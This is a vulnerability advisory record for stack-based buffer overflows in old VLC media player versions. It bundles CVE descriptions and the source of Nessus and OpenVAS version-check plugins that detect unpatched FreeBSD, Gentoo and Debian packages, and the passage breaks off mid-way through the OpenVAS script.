ID 4B09378E-ADDB-11DD-A578-0030843D3802 Type freebsd Reporter FreeBSD Modified 2010-05-02T00:00:00
Description
The VLC Team reports:
The VLC media player contains a stack overflow vulnerability
while parsing malformed cue files. The vulnerability may be
exploited by a (remote) attacker to execute arbitrary code in
the context of VLC media player.
{"cve": [{"lastseen": "2018-10-12T11:33:48", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 might allow user-assisted attackers to execute arbitrary code via an an invalid RealText (rt) subtitle file, related to the ParseRealText function in modules/demux/subtitle.c. NOTE: this issue was SPLIT from CVE-2008-5032 on 20081110.", "modified": "2018-10-11T16:53:31", "published": "2008-11-10T17:18:34", "id": "CVE-2008-5036", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5036", "title": "CVE-2008-5036", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-12T11:33:48", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in VideoLAN VLC media player 0.5.0 through 0.9.5 might allow user-assisted attackers to execute arbitrary code via the header of an invalid CUE image file, related to modules/access/vcd/cdrom.c. NOTE: this identifier originally included an issue related to RealText, but that issue has been assigned a separate identifier, CVE-2008-5036.", "modified": "2018-10-11T16:53:29", "published": "2008-11-10T11:15:12", "id": "CVE-2008-5032", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5032", "title": "CVE-2008-5032", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:11:18", "bulletinFamily": "scanner", "description": "A version of VLC between 0.5.0 and 0.9.5 is installed on the remote host. Such versions are affected by the following vulnerabilities :\n\n - RealText subtitle file (modules\\demux\\subtitle.c) processing is susceptible to a buffer overflow caused by user-supplied data from a malicious subtitle file being copied into static buffers without proper validation.\n\n - CUE image file (modules\\access\\vcd\\cdrom.c) processing is susceptible to a stack-based buffer overflow because data supplied by the CUE file is supplied as an array index without proper validation.\n\nAn attacker may be able to leverage these issues to execute arbitrary code on the remote host by tricking a user into opening a specially crafted video file using the affected application.", "modified": "2018-11-15T00:00:00", "id": "VLC_0_9_6.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=34730", "published": "2008-11-10T00:00:00", "title": "VLC Media Player 0.5.0 to 0.9.5 Stack-Based Buffer Overflows", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34730);\n script_version(\"1.17\");\n\n script_cve_id(\"CVE-2008-5032\", \"CVE-2008-5036\");\n script_bugtraq_id(32125, 36403);\n script_xref(name:\"EDB-ID\", value:\"18548\");\n\n script_name(english:\"VLC Media Player 0.5.0 to 0.9.5 Stack-Based Buffer Overflows\");\n script_summary(english:\"Checks version of VLC Media Player\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains an application that is affected by\nmultiple buffer overflow vulnerabilities.\" );\n\n script_set_attribute(attribute:\"description\", value:\n\"A version of VLC between 0.5.0 and 0.9.5 is installed on the remote\nhost. Such versions are affected by the following vulnerabilities :\n\n - RealText subtitle file (modules\\demux\\subtitle.c)\n processing is susceptible to a buffer overflow caused \n by user-supplied data from a malicious subtitle file \n being copied into static buffers without proper \n validation.\n\n - CUE image file (modules\\access\\vcd\\cdrom.c)\n processing is susceptible to a stack-based buffer \n overflow because data supplied by the CUE file is \n supplied as an array index without proper validation.\n\nAn attacker may be able to leverage these issues to execute arbitrary\ncode on the remote host by tricking a user into opening a specially\ncrafted video file using the affected application.\" );\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.trapkit.de/advisories/TKADV2008-012.txt\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/498111/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/498112/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.videolan.org/security/sa0810.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://permalink.gmane.org/gmane.comp.security.oss.general/1140\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VLC version 0.9.6 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VLC Media Player RealText Subtitle Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/11/10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:videolan:vlc_media_player\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vlc_installed.nasl\");\n script_require_keys(\"SMB/VLC/Version\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\n\nver = get_kb_item(\"SMB/VLC/Version\");\nif (ver && ver =~ \"^0\\.([5-8]\\.|9\\.[0-5]($|[^0-9]))\")\n{\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n \"VLC Media Player version \", ver, \" is currently installed on the remote host.\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:11:18", "bulletinFamily": "scanner", "description": "The VLC Team reports :\n\nThe VLC media player contains a stack overflow vulnerability while parsing malformed cue files. The vulnerability may be exploited by a (remote) attacker to execute arbitrary code in the context of VLC media player.", "modified": "2018-11-10T00:00:00", "id": "FREEBSD_PKG_4B09378EADDB11DDA5780030843D3802.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=34723", "published": "2008-11-09T00:00:00", "title": "FreeBSD : vlc -- cue processing stack overflow (4b09378e-addb-11dd-a578-0030843d3802)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34723);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:41\");\n\n script_cve_id(\"CVE-2008-5032\", \"CVE-2008-5036\");\n\n script_name(english:\"FreeBSD : vlc -- cue processing stack overflow (4b09378e-addb-11dd-a578-0030843d3802)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The VLC Team reports :\n\nThe VLC media player contains a stack overflow vulnerability while\nparsing malformed cue files. The vulnerability may be exploited by a\n(remote) attacker to execute arbitrary code in the context of VLC\nmedia player.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.videolan.org/security/sa0810.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.trapkit.de/advisories/TKADV2008-012.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/4b09378e-addb-11dd-a578-0030843d3802.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c8e361df\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VLC Media Player RealText Subtitle Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:vlc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:vlc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"vlc<0.8.6.i_2,2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"vlc-devel<0.9.6,3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:11:25", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200812-24 (VLC: Multiple vulnerabilities)\n\n Tobias Klein reported the following vulnerabilities:\n A stack-based buffer overflow when processing CUE image files in modules/access/vcd/cdrom.c (CVE-2008-5032).\n A stack-based buffer overflow when processing RealText (.rt) subtitle files in the ParseRealText() function in modules/demux/subtitle.c (CVE-2008-5036).\n An integer overflow when processing RealMedia (.rm) files in the ReadRealIndex() function in real.c in the Real demuxer plugin, leading to a heap-based buffer overflow (CVE-2008-5276).\n Impact :\n\n A remote attacker could entice a user to open a specially crafted CUE image file, RealMedia file or RealText subtitle file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-07-11T00:00:00", "id": "GENTOO_GLSA-200812-24.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=35271", "published": "2008-12-26T00:00:00", "title": "GLSA-200812-24 : VLC: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200812-24.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35271);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/11 17:09:25\");\n\n script_cve_id(\"CVE-2008-5032\", \"CVE-2008-5036\", \"CVE-2008-5276\");\n script_bugtraq_id(32125);\n script_xref(name:\"GLSA\", value:\"200812-24\");\n\n script_name(english:\"GLSA-200812-24 : VLC: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200812-24\n(VLC: Multiple vulnerabilities)\n\n Tobias Klein reported the following vulnerabilities:\n A\n stack-based buffer overflow when processing CUE image files in\n modules/access/vcd/cdrom.c (CVE-2008-5032).\n A stack-based\n buffer overflow when processing RealText (.rt) subtitle files in the\n ParseRealText() function in modules/demux/subtitle.c\n (CVE-2008-5036).\n An integer overflow when processing RealMedia\n (.rm) files in the ReadRealIndex() function in real.c in the Real\n demuxer plugin, leading to a heap-based buffer overflow\n (CVE-2008-5276).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted CUE\n image file, RealMedia file or RealText subtitle file, possibly\n resulting in the execution of arbitrary code with the privileges of the\n user running the application.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200812-24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All VLC users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/vlc-0.9.8a'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VLC Media Player RealText Subtitle Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vlc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-video/vlc\", unaffected:make_list(\"ge 0.9.8a\"), vulnerable:make_list(\"lt 0.9.8a\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"VLC\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:00", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in vlc, a multimedia player and streamer. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2008-1768 Drew Yao discovered that multiple integer overflows in the MP4 demuxer, Real demuxer and Cinepak codec can lead to the execution of arbitrary code.\n\n - CVE-2008-1769 Drew Yao discovered that the Cinepak codec is prone to a memory corruption, which can be triggered by a crafted Cinepak file.\n\n - CVE-2008-1881 Luigi Auriemma discovered that it is possible to execute arbitrary code via a long subtitle in an SSA file.\n\n - CVE-2008-2147 It was discovered that vlc is prone to a search path vulnerability, which allows local users to perform privilege escalations.\n\n - CVE-2008-2430 Alin Rad Pop discovered that it is possible to execute arbitrary code when opening a WAV file containing a large fmt chunk.\n\n - CVE-2008-3794 Pinar Yanardag discovered that it is possible to execute arbitrary code when opening a crafted mmst link.\n\n - CVE-2008-4686 Tobias Klein discovered that it is possible to execute arbitrary code when opening a crafted .ty file.\n\n - CVE-2008-5032 Tobias Klein discovered that it is possible to execute arbitrary code when opening an invalid CUE image file with a crafted header.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-1819.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39451", "published": "2009-06-19T00:00:00", "title": "Debian DSA-1819-1 : vlc - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1819. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39451);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/10 11:49:34\");\n\n script_cve_id(\"CVE-2008-1768\", \"CVE-2008-1769\", \"CVE-2008-1881\", \"CVE-2008-2147\", \"CVE-2008-2430\", \"CVE-2008-3794\", \"CVE-2008-4686\", \"CVE-2008-5032\");\n script_bugtraq_id(32125);\n script_xref(name:\"DSA\", value:\"1819\");\n\n script_name(english:\"Debian DSA-1819-1 : vlc - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in vlc, a multimedia\nplayer and streamer. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-1768\n Drew Yao discovered that multiple integer overflows in\n the MP4 demuxer, Real demuxer and Cinepak codec can lead\n to the execution of arbitrary code.\n\n - CVE-2008-1769\n Drew Yao discovered that the Cinepak codec is prone to a\n memory corruption, which can be triggered by a crafted\n Cinepak file.\n\n - CVE-2008-1881\n Luigi Auriemma discovered that it is possible to execute\n arbitrary code via a long subtitle in an SSA file.\n\n - CVE-2008-2147\n It was discovered that vlc is prone to a search path\n vulnerability, which allows local users to perform\n privilege escalations.\n\n - CVE-2008-2430\n Alin Rad Pop discovered that it is possible to execute\n arbitrary code when opening a WAV file containing a\n large fmt chunk.\n\n - CVE-2008-3794\n Pinar Yanardag discovered that it is possible to\n execute arbitrary code when opening a crafted mmst link.\n\n - CVE-2008-4686\n Tobias Klein discovered that it is possible to execute\n arbitrary code when opening a crafted .ty file.\n\n - CVE-2008-5032\n Tobias Klein discovered that it is possible to execute\n arbitrary code when opening an invalid CUE image file\n with a crafted header.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=478140\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=477805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=489004\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496265\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=503118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=480724\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-1768\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-1769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-1881\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-2147\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-2430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3794\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-4686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1819\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the vlc packages.\n\nFor the oldstable distribution (etch), these problems have been fixed\nin version 0.8.6-svn20061012.debian-5.1+etch3.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 0.8.6.h-4+lenny2, which was already included in the lenny\nrelease.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VLC Media Player RealText Subtitle Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119, 189, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:vlc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"libvlc0\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libvlc0-dev\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"mozilla-plugin-vlc\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"vlc\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"vlc-nox\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"vlc-plugin-alsa\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"vlc-plugin-arts\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"vlc-plugin-esd\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"vlc-plugin-ggi\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"vlc-plugin-glide\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"vlc-plugin-sdl\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"vlc-plugin-svgalib\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"wxvlc\", reference:\"0.8.6-svn20061012.debian-5.1+etch3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"vlc\", reference:\"0.8.6.h-4+lenny2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-10-04T00:00:00", "published": "2008-11-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=61879", "id": "OPENVAS:61879", "title": "FreeBSD Ports: vlc", "type": "openvas", "sourceData": "#\n#VID 4b09378e-addb-11dd-a578-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 4b09378e-addb-11dd-a578-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n vlc\n vlc-devel\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.videolan.org/security/sa0810.html\nhttp://www.trapkit.de/advisories/TKADV2008-012.txt\nhttp://www.vuxml.org/freebsd/4b09378e-addb-11dd-a578-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(61879);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 4203 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-10-04 07:30:30 +0200 (Tue, 04 